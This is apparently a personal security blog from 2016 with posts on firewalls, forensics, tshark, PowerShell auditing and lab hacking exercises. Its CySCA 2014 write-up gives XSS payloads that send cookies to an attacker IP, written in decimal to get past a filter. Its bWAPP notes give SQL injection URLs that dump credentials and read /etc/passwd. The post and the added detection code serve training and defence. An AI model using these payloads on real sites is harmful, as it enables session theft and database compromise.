Sunday, March 13, 2016

Weevely - PHP Backdoor

Recently at BSides SLC 2016 I had a class which introduced the usage of Weevely.  Here are a couple of links that complemented the training that I had:

http://exploiterz.blogspot.com/2013/09/how-to-backdoor-webserver-using-weevely.html

http://null-byte.wonderhowto.com/forum/hiob-generate-web-backdoors-php-using-weevely-kali-linux-0158905/

Saturday, March 12, 2016

Simple Script to Configure iptables

I have been utilizing Cloud at Cost to put together a variety of labs.  I built the iptables script below to configure a base installation until I can configure it further.

#!/bin/bash
# Base inbound firewall: default-deny INPUT, allow loopback, established sessions
# and the listed TCP ports; log everything else just before the policy drops it.

allowedTCPInbound="22"
#allowedUDPInbound="53"

# Flush all rules, delete user-defined chains, zero the counters
iptables -F
iptables -X
iptables -Z

# Default policies: drop inbound and forwarded traffic, allow outbound
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT

# Match loopback on the interface rather than on source 127.0.0.1, so a packet
# arriving on a real interface with a spoofed loopback source is not accepted
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

for port in $allowedTCPInbound; do
 #iptables -A INPUT -p tcp --dport $port -j LOG --log-prefix '*** Allowed TCP *** '
 iptables -A INPUT -p tcp --dport $port -j ACCEPT
done

#for port in $allowedUDPInbound; do
# iptables -A INPUT -p udp --dport $port -j LOG --log-prefix '*** Allowed UDP *** '
# iptables -A INPUT -p udp --dport $port -j ACCEPT
#done

# Silently drop chatty LAN broadcast/discovery traffic so it does not flood the log
iptables -A INPUT -p udp --dport 67 -j DROP     # DHCP/BOOTP server port
iptables -A INPUT -p udp --dport 137 -j DROP    # NetBIOS name service
iptables -A INPUT -p udp --dport 138 -j DROP    # NetBIOS datagram service
iptables -A INPUT -p tcp --dport 139 -j DROP    # NetBIOS session service (SMB)
iptables -A INPUT -p tcp --dport 445 -j DROP    # SMB over TCP
iptables -A INPUT -p udp --dport 9181 -j DROP   # Broadcast traffic observed on this host
iptables -A INPUT -p udp --dport 17500 -j DROP  # Dropbox LAN sync discovery
iptables -A INPUT -p udp --dport 32412 -j DROP  # Plex Server UDP device discovery
iptables -A INPUT -p udp --dport 32414 -j DROP  # Plex Server UDP device discovery

# Log whatever is left before the INPUT policy drops it. The trailing space keeps the
# prefix from running into the IN= field; iptables allows at most 29 characters here.
iptables -A INPUT -p tcp -j LOG --log-prefix '*** DROP TCP Connection *** '
iptables -A INPUT -p udp -j LOG --log-prefix '*** DROP UDP Connection *** '
iptables -A INPUT -p icmp -j LOG --log-prefix '*** DROP ICMP Connection *** '

You can also download it from here.
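As an added example (my own code, not part of the original post), here is a small Python parser for the kernel log lines that the LOG rules above produce, aggregating dropped packets per source, protocol and destination port. The log lines are constructed for illustration, and the parser accepts the prefix both with and without a trailing space, since the original prefixes had none.

```python
import re
from collections import Counter

# Constructed sample of syslog lines as the script's LOG rules would emit them (not real
# traffic). Line 3 uses the prefix without a trailing space to show the parser still copes
# when the prefix runs straight into the IN= field.
SAMPLE_LOG = """\
Mar 12 10:00:01 lab kernel: *** DROP TCP Connection *** IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=203.0.113.10 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=51234 DPT=23 WINDOW=29200 RES=0x00 SYN URGP=0
Mar 12 10:00:02 lab kernel: *** DROP TCP Connection *** IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=203.0.113.10 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=51235 DPT=3389 WINDOW=29200 RES=0x00 SYN URGP=0
Mar 12 10:00:03 lab kernel: *** DROP UDP Connection ***IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.0.2.44 DST=203.0.113.10 LEN=78 TOS=0x00 PREC=0x00 TTL=64 ID=1 PROTO=UDP SPT=5353 DPT=5353 LEN=58
Mar 12 10:00:04 lab kernel: *** DROP ICMP Connection *** IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=203.0.113.10 LEN=84 TOS=0x00 PREC=0x00 TTL=52 ID=2 PROTO=ICMP TYPE=8 CODE=0 ID=1 SEQ=1
Mar 12 10:00:05 lab sshd[123]: Accepted publickey for user from 203.0.113.5 port 40000 ssh2
"""

# The prefix written by the script's LOG rules, followed by netfilter's KEY=VALUE fields
LOG_RE = re.compile(r"\*\*\* (?P<action>DROP|Allowed) (?P<proto>TCP|UDP|ICMP) Connection \*\*\* ?(?P<rest>.*)$")
KV_RE = re.compile(r"(\w+)=(\S*)")   # bare flags such as DF or SYN carry no '=' and are skipped


def parse_line(line):
    """Return a dict for one netfilter LOG line, or None for any other syslog line."""
    m = LOG_RE.search(line)
    if not m:
        return None
    fields = dict(KV_RE.findall(m.group("rest")))
    return {
        "action": m.group("action"),
        "proto": m.group("proto"),
        "src": fields.get("SRC"),
        "dst": fields.get("DST"),
        "dport": fields.get("DPT"),        # absent for ICMP
        "icmp_type": fields.get("TYPE"),   # present only for ICMP
    }


def summarize_drops(text):
    """Count dropped packets per (source address, protocol, destination port)."""
    counts = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and rec["action"] == "DROP":
            counts[(rec["src"], rec["proto"], rec["dport"])] += 1
    return counts


def sources_by_drops(text):
    """Total dropped packets per source address, busiest first."""
    totals = Counter()
    for (src, _proto, _dport), n in summarize_drops(text).items():
        totals[src] += n
    return totals.most_common()
```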

Friday, March 11, 2016

BSides 2016 Hackers Challenge

At BSides 2016 I participated in their Hackers Challenge.  The challenges were based on reverse engineering, network packet analysis, and many other puzzles that you needed to figure out.  When I had hit the wall at 3AM in the morning on March 11th I was in 2nd place.  By the end of the competition which was at 10AM I had dropped to 7th.  The challenge was great! Thanks BSides...

Check out the django.nV project.  This project was used in the Hackers Challenge but was adapted from its original state.

Screenshot of being in 2nd place at 3AM.

Screenshot of being in 7th place at the end of the competition.

One thing to note is that most of the challenges were worth 4,000 points in the beginning.  If you completed a challenge and no one else did, you kept the 4,000 points.  For each additional participant who completed the challenge, the points were divided among you.

Responsible Disclosure of CSRF in PHP Fusion 9

Recently I did some testing with PHP Fusion 9 and found that I could create additional users while the admin is logged in, due to the application not protecting against CSRF.  I reached out to the development team and they had it fixed within 72 hours.  Below is the original video that I sent them; they then provided one back showing they had fixed it and asking me to test it again.

Video - Adding a user account through CSRF

Then here is their response about fixing the vulnerability in version 9.
Here is the YouTube video that he posted, as shown in the screenshot above:  https://www.youtube.com/watch?v=5eLfA_ZEujQ&feature=youtu.be

Forensics - Mount Windows Partition Showing the System Files

Mount a Windows (NTFS) partition read-only with ntfs-3g, showing the system files and exposing alternate data streams through the Windows-style streams interface:
mount -o ro,show_sys_files,streams_interface=windows /dev/sdb2 /mnt/analysis

Taken from "Super Time Line Analysis - SANS DFIR Webcast" https://www.youtube.com/watch?v=C4jNfXZ90fw


CyberSecurity Challenge Australia 2014 In a Box - YAWU - Yet Another Write-up

This challenge can be downloaded from vulnhub.com.

Web Application Pentest Section

80 points - Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.

Looking at the web page, we notice when the page is first visited that the link to the "Blog" is disabled.  Somehow we need to re-enable the link to get the flag.

Below is a Python script to quickly send a GET request to the index.py page.

Notice that among the cookies returned is vip=0.  From this you can suppose that a VIP user has a value other than 0.  If I modify it to 1, the link to the Blog becomes enabled, and clicking on the Blog link then reveals the flag.

160 points - Gain access to the Blog as a registered user to reveal the hidden flag.

The blog allows you to insert comments, so I checked whether XSS is possible as a comment is inserted.  At the bottom of the textbox you can see how to make text bold or italicized and how to add a link.  Upon testing the addition of a link, the link title is where we can place the XSS.
With this understanding we can now include XSS in the page to pull the session cookies of other visitors to the pages.  I tried the following in a link title tag:

[<SCRIPT type="text/javascript">var adr = 'http://172.16.102.1/test.php?cookie=' + escape(document.cookie);</SCRIPT>](Test)

This above script was filtered and not posted as a comment...  Trying a different encoding. (URL encoded)

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172.16.102.1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

This time the comment did post as a link however the IP Address is truncated after the first octet.  Going to further encode the IP Address and change the periods to be URL encoded.

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172%2E16%2E102%2E1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

Tried the above and it still caught the IP Address that was encoded.  I need a way to encode the IP address and found the following:


This is interesting. The link in this page appears as the following:

<a id="ctl00_ctl00_WholeBody_ContentPane_ContentArea_Body_encCrazyIp" href="http://2886755841" style="font-weight:bold;">2886755841</a>


Below is a Python script that I found to convert an IP address to a decimal-encoded number.

#!/usr/bin/python3
# Pack the dotted quad into its four network-order bytes, then read those bytes back as one unsigned 32-bit integer
import socket, struct
print(struct.unpack("!I", socket.inet_aton("172.16.102.1"))[0])
Output: 2886755841
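As an added example, not from the original write-up, here is the same conversion with Python's ipaddress module, its inverse, and a URL normalizer a defender can run before any host filter: the comment filter above only recognised the dotted form, so canonicalizing an integer host (decimal, or the 0x-prefixed hex form browsers also accept) back to dotted-quad is what closes that gap. All function names are my own.

```python
import ipaddress
from urllib.parse import urlsplit, urlunsplit


def ip_to_decimal(dotted: str) -> int:
    """Dotted-quad IPv4 address to the single 32-bit integer browsers also accept as a host."""
    return int(ipaddress.IPv4Address(dotted))


def decimal_to_ip(value: int) -> str:
    """Inverse of ip_to_decimal; raises ValueError if value does not fit in 32 bits."""
    return str(ipaddress.IPv4Address(value))


def normalize_host(host: str) -> str:
    """Rewrite a decimal or 0x-prefixed hex integer hostname to dotted-quad form.
    A normal dotted address or a DNS name is returned unchanged."""
    h = host.lower()
    try:
        if h.startswith("0x"):
            return decimal_to_ip(int(h, 16))
        if h.isdigit():
            return decimal_to_ip(int(h))
    except ValueError:
        pass  # out-of-range integer: leave it for the caller to reject
    return host


def normalize_url(url: str) -> str:
    """Return url with an integer-form host rewritten so allow/deny checks see the real address."""
    parts = urlsplit(url)
    if parts.hostname is None:
        return url
    new_host = normalize_host(parts.hostname)
    if new_host == parts.hostname:
        return url
    netloc = new_host if parts.port is None else f"{new_host}:{parts.port}"
    return urlunsplit(parts._replace(netloc=netloc))


if __name__ == "__main__":
    print(ip_to_decimal("172.16.102.1"))
    print(normalize_url("http://2886755841/test.php?cookie=x"))
```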

With the encoded IP Address I changed the comment to be as follows however I notice that we are truncated to just 50+ characters:

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F2886755841%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

So the following does pull the PHPSESSID:

[<script>document.location='http://2886755841/?c='+document.cookie;</script>](Test)

However this redirects the user and does not do it blindly. (The below does not work.)

[<script src='http://2886755841/?c='+document.cookie></script>](Test)

220 points - Retrieve the hidden flag from the database.



260 points - Retrieve the hidden flag by gaining access to the caching control panel.



280 points - Reveal the final flag, which is hidden in the /flag.txt file on the web server.

cmd.exe Count Lines returned with netstat from the command line

I was testing the threshold of the number of connections on a web server and threw together a DOS command to accomplish the minor task.  Inside the command prompt I executed:

netstat -an | find /i "<ip address>" | find /N /i "ESTABLISHED"

tshark - More than I ever wanted to know...

Recently I purchased the book "The Practice of Network Security Monitoring" by Richard Bejtlich.  I was reading in chapter 7 of the book about the Digital Corpora project located at http://www.digitalcorpora.org.  In the chapter he presents the "Nitroba University Harassment Scenario".  A pcap can be downloaded covering how a teacher was being harassed by a student, and the object of the scenario is to identify who did it and with what evidence.  The scenario and the files you need are located at the following link.

In the book they are using the scenario to explain and teach about the tool called Xplico.  However, I am going to use the scenario to identify useful tshark commands that can be used in such an investigation.

The first lead in the investigation is that of an IP Address.  "The mail header shows that the mail message originated from the IP address 140.247.62.34, which is a Nitroba student dorm room. "

IP Address: 140.247.62.34.  I am going to use tshark to isolate, and save to another pcap, all activity with that IP address as the source or destination.

tshark -r nitroba.pcap -Y "ip.src==140.247.62.34 or ip.dst==140.247.62.34" -w 140_247_62_34.pcap

The above tshark command reads like this:
-r nitroba.pcap - Read the nitroba.pcap file
-Y "ip.src==140.247.62.34 or ip.dst==140.247.62.34" - Display filter: keep only packets whose source or destination address is 140.247.62.34
-w 140_247_62_34.pcap - Write the matching packets to this file

From the information that is extracted, the IP address 192.168.15.4 is observed.  This is a private, non-routable IP address.  I wonder how many private, non-routable IP addresses there are in the packet capture:

tshark -r nitroba.pcap -T fields -e ip.src > ip-src.txt

The above tshark command reads like this:
-T fields - Sets the output to that of fields
-e ip.src - Defines which fields to output
> ip-src.txt - Redirects the output to a text file

$ cat ip-src.txt | sort | uniq -c | sort -n | grep -e " 172\." -e " 192\.168\." -e " 10\."
      2 192.168.15.2
      3 192.168.15.7
      6 192.168.15.8
      8 10.0.1.5
     14 192.168.15.5
     16 192.168.1.5
   1486 192.168.1.254
   2154 192.168.15.1
   6818 192.168.1.64
  34554 192.168.15.4

The above pipeline takes the list of source IP addresses, sorts it so identical addresses are adjacent, uses uniq -c to collapse each address to one line prefixed with its count, sorts again by that count, and finally greps out the private IP address ranges.

We can tell the busiest device is 192.168.15.4.  Let's look into the devices more and try and determine what they are.  I am going to use the MAC addresses of each device to try and identify the vendor that manufactured the device.

tshark -r nitroba.pcap -T fields -e ip.src -e eth.src > ip-src-and-mac-src.txt
cat ip-src-and-mac-src.txt | sort | uniq -c | sort -rn | grep -e " 172\." -e " 192\.168\." -e " 10\."

Count   IP Address      MAC Address         Vendor
34554   192.168.15.4    00:17:f2:e2:c0:ce   Apple
 6814   192.168.1.64    00:1d:d9:2e:4f:61   Hon Hai Precision
 2154   192.168.15.1    00:1d:d9:2e:4f:60   Hon Hai Precision
 1161   192.168.1.254   00:1d:d9:2e:4f:60   Hon Hai Precision
  325   192.168.1.254   00:1d:6b:99:98:68   Arris Group
   16   192.168.1.5     00:0a:95:69:38:cc   Apple
   14   192.168.15.5    00:14:d1:44:a0:f1   Trendnet
    8   10.0.1.5        00:1c:b3:79:00:31   Apple
    6   192.168.15.8    00:16:cb:b4:a3:f8   Apple
    4   192.168.1.64    00:1f:f3:5a:77:9b   Apple
    3   192.168.15.7    00:1c:b3:79:00:31   Apple
    2   192.168.15.2    00:1b:63:f1:8a:6e   Apple

Adding the source Ethernet address shows that there are a total of 12 devices we should gather knowledge about, not just the 10 suggested by the IP addresses alone.  Two IP addresses, 192.168.1.64 and 192.168.1.254, each appear with more than one MAC address (these were bolded in the original post).  I also included the manufacturer next to each MAC address.

The MAC address 00:1c:b3:79:00:31 is also found to have used two IP addresses: 10.0.1.5 and 192.168.15.7.
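An added example (my own code, not from the post) that does the same grouping in Python over constructed tshark output in the `-T fields -e ip.src -e eth.src` layout (tab-separated, ip.src blank for frames with no IP header). It filters on the actual RFC 1918 ranges, which the grep pattern above only approximates (" 172\." would also keep public 172.x addresses), and reports the IPs seen with more than one MAC and the MACs seen with more than one IP, as discussed above.

```python
import ipaddress
from collections import Counter, defaultdict

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample in the layout `tshark -T fields -e ip.src -e eth.src` emits:
# one frame per line, tab-separated. Values mirror the capture discussed above.
SAMPLE = (
    "192.168.15.4\t00:17:f2:e2:c0:ce\n" * 3
    + "192.168.1.64\t00:1d:d9:2e:4f:61\n" * 2
    + "192.168.1.64\t00:1f:f3:5a:77:9b\n"
    + "192.168.1.254\t00:1d:d9:2e:4f:60\n"
    + "192.168.15.1\t00:1d:d9:2e:4f:60\n"
    + "192.168.1.254\t00:1d:6b:99:98:68\n"
    + "10.0.1.5\t00:1c:b3:79:00:31\n"
    + "192.168.15.7\t00:1c:b3:79:00:31\n"
    + "172.20.1.9\t00:aa:bb:cc:dd:ee\n"        # inside 172.16.0.0/12: private
    + "172.217.0.1\t00:1d:d9:2e:4f:60\n"       # public 172.x that a bare " 172\." grep would keep
    + "\t00:1d:d9:2e:4f:60\n"                  # ARP or other non-IP frame: empty ip.src
)


def is_rfc1918(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:          # empty or malformed field
        return False
    return any(addr in net for net in RFC1918)


def count_pairs(text: str) -> Counter:
    """Count (ip.src, eth.src) pairs for private sources, like the sort | uniq -c step above."""
    pairs = Counter()
    for line in text.splitlines():
        cols = line.split("\t")
        if len(cols) != 2 or not is_rfc1918(cols[0]):
            continue
        pairs[(cols[0], cols[1])] += 1
    return pairs


def multi_homed(pairs: Counter):
    """IPs seen with more than one MAC, and MACs seen with more than one IP."""
    ip_to_macs, mac_to_ips = defaultdict(set), defaultdict(set)
    for ip, mac in pairs:
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
    ips = {ip: sorted(m) for ip, m in ip_to_macs.items() if len(m) > 1}
    macs = {mac: sorted(i) for mac, i in mac_to_ips.items() if len(i) > 1}
    return ips, macs
```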

192.168.1.64 is the gateway
192.168.1.254 is the DNS Server
192.168.15.1 is the inside of the gateway
192.168.15.4 is the main IP of interest
192.168.15.5 is nothing


Did not complete the scenario...

File and Folder Auditing with Powershell

http://blogs.technet.com/b/zarkatech/archive/2012/01/14/audit-file-server-permissions-using-powershell.aspx


$ErrorActionPreference = "Continue"
$strComputer = $env:ComputerName
$colDrives = Get-PSDrive -PSProvider Filesystem
$StartPath = "\\myserver\share"
# Walk the share and write one CSV row per access control entry (ACE) on every file and folder
Get-ChildItem -LiteralPath $StartPath -Recurse |
ForEach {
  $FullPath = Get-Item -LiteralPath $_.FullName
  # Select * -Expand Access flattens the ACL into one object per ACE while keeping the
  # ACL's own properties (such as Owner) available on each of them
  $FullPath.GetAccessControl() |
  Select * -Expand Access |
  Select @{N='Server Name';E={$strComputer}},
         @{N='Full Path';E={$FullPath.FullName}},
         @{N='Type';E={If($FullPath.PSIsContainer -eq $True) {'D'} Else {'F'}}},
         @{N='Owner';E={$_.Owner}},
         @{N='Trustee';E={$_.IdentityReference}} } |
         # Extra ACE columns that can be added to the Select above (move the closing brace after the last one used):
         #@{N='Inherited';E={$_.IsInherited}},
         #@{N='Inheritance Flags';E={$_.InheritanceFlags}},
         #@{N='Ace Flags';E={$_.PropagationFlags}},
         #@{N='Ace Type';E={$_.AccessControlType}},
         #@{N='Access Masks';E={$_.FileSystemRights}} } |
  Export-CSV -NoTypeInformation -Delimiter "," -Path "$strComputer`_myserver-share.csv"

Audit File and Folder Permissions - Powershell

################################################################################
# AUDIT FILE & FOLDER PERMISSIONS v1.1
# by Roman Zarka | Microsoft Services
################################################################################

$ErrorActionPreference = "Continue"
$strComputer = $env:ComputerName
$colDrives = Get-PSDrive -PSProvider Filesystem
$StartPath = "\\server\share"
# Walk the share and write one CSV row per access control entry (ACE) on every file and folder
Get-ChildItem -LiteralPath $StartPath -Recurse |
ForEach {
  $FullPath = Get-Item -LiteralPath $_.FullName
  # Select * -Expand Access flattens the ACL into one object per ACE while keeping the
  # ACL's own properties (such as Owner) available on each of them
  $FullPath.GetAccessControl() |
  Select * -Expand Access |
  Select @{N='Server Name';E={$strComputer}},
         @{N='Full Path';E={$FullPath.FullName}},
         @{N='Type';E={If($FullPath.PSIsContainer -eq $True) {'D'} Else {'F'}}},
         @{N='Owner';E={$_.Owner}},
         @{N='Trustee';E={$_.IdentityReference}} } |
         # Extra ACE columns that can be added to the Select above (move the closing brace after the last one used):
         #@{N='Inherited';E={$_.IsInherited}},
         #@{N='Inheritance Flags';E={$_.InheritanceFlags}},
         #@{N='Ace Flags';E={$_.PropagationFlags}},
         #@{N='Ace Type';E={$_.AccessControlType}},
         #@{N='Access Masks';E={$_.FileSystemRights}} } |
  Export-CSV -NoTypeInformation -Delimiter "," -Path "$strComputer`_share.csv"

Notes from bWAPP v2.2

These are my quick notes that I recorded as I worked through bWAPP v2.2.

--- SQLi GET / Search Results - With security level set to low

URL with SQLi:
http://bwapp/sqli_1.php?title=a' union SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search

The above query was taken from the MySQL SQL Injection Cheat Sheet located here.  The purpose of this query is to return the schema and table names from the database.  I also had to experiment with the number of columns that were expected and how it was displayed.

Now I need to find out the structure of the tables...

URL for SQLi:
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27%20AND%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema&action=search

The above SQL injection returns, for every table outside the mysql and information_schema databases, the columns whose name is password, so now we can formulate our query to begin extracting information.  The query below counts the records in the users table before we extract them, in case a lot of records are available to be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

This returns that there are 2 records that can be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20login,%20password,%20email,%20admin,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

The above query returned the login, password, email and if they are an admin of the application in the search results...

--- SQLi GET / Select - With security level set to low...

In this challenge only one record is returned at a time because, looking at the code, it does not loop over the recordset that is returned.  This adds a small challenge; however, it is not impossible to do the same thing as above.

SQLi URL:
http://bwapp/sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27&action=go

The above query returns the 99th row of the union-selected result and also loads the /etc/passwd file, so we can gather the user names on the system.

SQL Injection Boolean Based

— The below method would allow for trying each character in a character set until it came back with the correct character...
Iron Man' AND SUBSTRING(@@hostname,1,1) = 'b - Worked
Iron Man' AND SUBSTRING(@@hostname,2,1) = 'W - Worked

— What if we use regular expressions to determine if the letter is between a set of characters...

Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-n] - Returns True
Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-g] - Returns True
Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-c] - Returns True
— This narrows it down to fewer than 8 queries to figure out the first character of the hostname...  It would have taken 2 or 28 depending on whether you started with a-z or A-Z.
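From the defender's side, here is an added example (my own code, not part of these bWAPP notes) that scans constructed Apache-style access log lines, replaying the requests from the notes, for the injection patterns they use: UNION SELECT, information_schema, LOAD_FILE() and the boolean SUBSTRING/REGEXP probes against @@hostname. Fully decoding each query parameter first is what lets the signatures match the URL-encoded forms seen above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed log lines: a benign search followed by the requests from the notes above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2016:10:00:00 +0000] "GET /sqli_1.php?title=Iron+Man&action=search HTTP/1.1" 200 2048
10.0.0.9 - - [12/Mar/2016:10:00:01 +0000] "GET /sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27&action=search HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2016:10:00:02 +0000] "GET /sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables&action=go HTTP/1.1" 200 4096
10.0.0.9 - - [12/Mar/2016:10:00:03 +0000] "GET /sqli_1.php?title=Iron+Man%27+AND+SUBSTRING%28%40%40hostname%2C1%2C1%29+REGEXP+%27%5Ba-n%5D&action=search HTTP/1.1" 200 1024
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) ')

# Each pattern is checked against the fully decoded, lower-cased parameter value.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\b.+\bselect\b"),
    "schema-enum": re.compile(r"information_schema\."),
    "file-read": re.compile(r"\bload_file\s*\("),
    "blind-substring": re.compile(r"\bsubstring\s*\(.*(=|\bregexp\b)"),
    "server-var": re.compile(r"@@\w+"),
}


def decode_param(value: str) -> str:
    """Decode repeatedly so double-encoded payloads also land on the signatures."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def scan_log(text: str):
    """Return (client ip, path, parameter name, [signature names]) for each suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = decode_param(raw)
            matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
            if matched:
                hits.append((m.group("ip"), parts.path, name, matched))
    return hits
```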






Docker - Quick Notes and How To

For an ethical hacking class that I will be teaching coming up in the near future I wanted to identify a way where I could provide students ...